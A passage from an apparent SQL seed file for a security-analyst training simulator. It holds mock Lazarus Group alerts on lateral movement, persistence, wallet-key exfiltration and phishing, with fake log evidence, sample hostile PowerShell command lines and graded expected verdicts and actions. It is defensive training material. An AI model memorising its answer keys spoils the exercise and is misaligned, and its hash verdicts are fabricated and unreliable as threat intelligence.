Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1445, 'Establishing Persistence and Lateral Movement', 'high', 'Network Traffic Analysis', 'The Lazarus Group has been detected using stolen credentials to move laterally within the network, targeting critical aerospace and military data. The threat actor is leveraging known TTPs to maintain access and seek sensitive information.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"authentication\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.5.12\",\"user\":\"jdoe\",\"action\":\"login_success\",\"credentials\":{\"method\":\"password\",\"status\":\"compromised\"},\"malicious_file\":{\"filename\":\"persistent_agent.exe\",\"file_hash\":\"7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\"},\"attacker_ip\":\"203.0.113.5\"}', '2026-03-03 22:01:10', '2026-03-09 03:23:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials used for lateral movement\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with persistent malware used by Lazarus Group\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP 
address associated with Lazarus Group activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1446, 'Suspicious App Download Detected', 'medium', 'App Store logs', 'A suspicious cryptocurrency trading application potentially associated with the Lazarus Group was downloaded. The app is believed to be trojanized, aimed at infiltrating systems of cryptocurrency enthusiasts.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_id\":\"123456\",\"app_name\":\"CryptoTraderPro\",\"downloaded_by\":\"user@example.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"CryptoTraderProSetup.exe\"}', '2026-03-03 22:03:46', '2026-03-05 05:21:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Lazarus Group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially trojanized applications.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"CryptoTraderProSetup.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Trojanized application used to deliver malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, 
NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-03T22:56:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:55:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:54:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:53:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:52:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1447, 'Execution of Unknown Scripts', 'medium', 'Endpoint Detection and Response (EDR) alerts', 'Suspicious script execution detected on host machine. The script is associated with Lazarus Group\'s known tactics and attempts to establish control over the system by executing hidden scripts.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T07:23:45Z\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"DESKTOP-7A9B21Q\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"process_id\":2987,\"script_name\":\"hidden_script.ps1\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File hidden_script.ps1\",\"source_ip\":\"143.110.227.12\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\hidden_script.ps1\",\"event_type\":\"script_execution\",\"malicious_indicator\":true}', '2026-03-03 22:03:46', '2026-03-05 05:23:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"143.110.227.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in previous Lazarus Group campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"hidden_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Intel\",\"verdict\":\"suspicious\",\"details\":\"Script name not commonly used in normal operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1448, 'Establishment of Persistence Mechanism', 'medium', 'System logs', 'The malware modifies startup scripts, ensuring it runs upon system boot, thereby maintaining a foothold.', 'Persistence', 'T1547.001', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-14T03:24:00Z\",\"event_type\":\"startup_script_modification\",\"host\":\"compromised-host\",\"user\":\"admin\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"malware_name\":\"Lazarus_Persistence_Tool\",\"file_modified\":\"/etc/rc.local\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"modify\",\"description\":\"Startup script modified to include malicious binary execution.\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-03 22:03:46', '2026-03-05 05:24:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Lazarus Group\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash of a known Lazarus Group persistence tool\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-03T22:56:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:55:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:54:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:53:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:52:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1449, 'Unauthorized Lateral Movement Attempt', 'high', 'Network traffic analysis', 'An unauthorized lateral movement attempt was detected originating from an external IP address, utilizing stolen credentials to access additional systems within the network.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-10T13:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"failed\",\"hash\":\"6f5902ac237024bdd0c176cb93063dc4\",\"filename\":\"mimikatz.exe\",\"protocol\":\"SMB\",\"alert_id\":\"LTMV-2023-00045\"}', '2026-03-03 22:03:46', '2026-03-05 05:26:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal company server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"suspicious\",\"details\":\"Account potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Mimikatz variant\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File associated with credential 
dumping\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1450, 'Sensitive Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) alerts', 'Finalizing their operation, Lazarus exfiltrates valuable data, including cryptocurrency wallet keys, to external servers.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"dlp-20231012-0001\",\"source_ip\":\"10.0.0.101\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"wallet_keys.txt\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"file_transfer\",\"protocol\":\"HTTPS\",\"outbound_port\":443,\"threat_actor\":\"Lazarus Group\"}', '2026-03-03 22:03:46', '2026-03-05 05:27:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wallet_keys.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive cryptocurrency wallet keys.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with recent data exfiltration attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account used in the exfiltration 
event.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-03T22:56:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:55:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:54:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:53:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:52:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1451, 'Spear-Phishing Email Detected', 'high', 'Email security gateway logs', 'A spear-phishing email was detected targeting personnel at a cryptocurrency exchange, crafted to mimic a trusted partner.', 'Social Engineering', 'T1566.001', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-08T14:32:00Z\",\"email_id\":\"abcd1234@example.com\",\"from\":\"trustedpartner@example.com\",\"to\":\"employee@cryptoexchange.com\",\"subject\":\"Urgent: Account Verification Required\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"attachment\":\"Invoice_2023.zip\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"detected_malware\":\"CryptoCore\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\"}', '2026-03-07 00:50:13', '2026-03-09 05:48:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"trustedpartner@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain previously associated with phishing 